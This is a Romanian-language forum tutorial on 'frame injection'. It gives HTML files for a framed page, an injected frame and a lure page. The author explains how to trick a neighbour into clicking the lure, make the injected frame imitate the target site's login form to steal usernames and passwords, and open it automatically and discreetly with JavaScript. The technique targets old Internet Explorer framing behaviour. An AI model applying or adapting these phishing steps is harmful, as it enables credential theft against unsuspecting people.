UNIX, Linux, Programare, Scripting, Retele
unix, linux, programare, script, hosting, server, retele
|
Lista Forumurilor Pe Tematici
|
UNIX, Linux, Programare, Scripting, Retele | Reguli | Inregistrare | Login
POZE UNIX, LINUX, PROGRAMARE, SCRIPTING, RETELE
Nu sunteti logat.
|
Nou pe simpatie:
pisi_dulce
 | Femeie
25 ani
Maramures
cauta Barbat
28 - 57 ani |
|
operabilus
B.O.F.H.
 Din: Sillycon Valley
Inregistrat: acum 20 ani
Postari: 200
|
|
Injectii - by operabilus
Injectari. Toate sunt la moda. Peste tot se gasesc tutoriale de "SQL Injection", "E-Mail Injection", "PHP Injection"... inca nu am vazut nici un tutorial de "Frame Injection" pe forumurile de aici asa ca m-am apucat sa fac eu unu.
Ce inseamna Form Injection ?
Form Injection e o metoda de atac ca oricare alta. Este motivul pentru care Yahoo! Si-a schimbat designul vechi (tineti minte varianta cu fram-uri ?). Este motivul pentru care multi ISP nu ofera hosting pentru paginile care contin frame-uri, este motivul pentru care MSIE e luat la suturi toata ziua si Opera ridicat in slavi 
Cum functioneaza Form Injection ?
Ca sa intelegeti functionarea am pregatit cateva pagini HTML simple. Pun mai jos codul corespunzator fiecarei pagini:
index.html
Code:
<html><head></head>
<frameset border="0" frameborder="0" framespacing="0" rows="150,*">
<frame name="frame1" src="frame1.html">
<frame name="frame2" src="frame2.html">
</frameset>
</html> |
frame1.html
Code:
<html><head></head>
<body bgcolor="#CCCCCC">
Frame1
</body>
</html> |
frame2.html
Code:
<html><head></head>
<body bgcolor="#999999">
Frame2
</body></html> |
frame3.html
Code:
<html><head></head>
<body bgcolor="#FF0000">
Frame3 (cadru injectat)
</body></html> |
inj.html
Code:
<html><head></head>
<body>
<a href="frame3.html" target="frame2">Click aici !</a>
</body></html> |
Nimic spectaculos pana aici... revenind la functionalitate. Sa presupunem ca vecinul X viziteaza zilnic pagina Y care e construita cu cadre (frame-uri) si va intereseaza niste date care le stie vecinul X (conturi de mail sau alte gainarii).
Am presupus ca pagina X este index.html prezentat mai sus care incarca in pagina 2 cadre si anume frame1.html si frame2.html.
Daca deschideti index.html veti vedea ca cele doua pagini sunt incluse.
OK, now what ? Uploadam inj.html si frame3.html undeva unde avem un cont si il convingem pe vecinul X sa dea click pe adresa fisierului inj.html. Fisierul inj.html are un link catre frame3.html, link care se deschide ( target= ) in frame2.html. Singurul loc in care este declarat frame2 este pagina Y care o viziteaza vecinul (in cazul nostru index.html). Daca dati click pe link-ul din pagina inj.html veti vedea ca Frame2.html care normal e pe un alt server se deschide in cadrul cu numele frame2 (adica, al doilea cadru din index.html).
Simplu, nu ? Mai departe totul tine de imaginatie. Modificati frame3.html sa arate ca o pagina de pe site-ul Y in care se cere user si parola (scam), modificati inj.html sa deschida pagina automat, in background (cu javascript) si, bineinteles, puneti-i un nume mai putin sugestiv
Nota
De mentionat ca tehnica NU functioneaza pe orice browser. Functioneaza pe aproape toate variantele de M$ Internet Explorer, nu functioneaza pe Opera si... testati si voi si spuneti-mi pe ce l-ati facut sa mearga
_______________________________________
Portal SkullBox
SkullBox Forum
IP Finder and web browser details revealer
|
|
| pus acum 19 ani |
|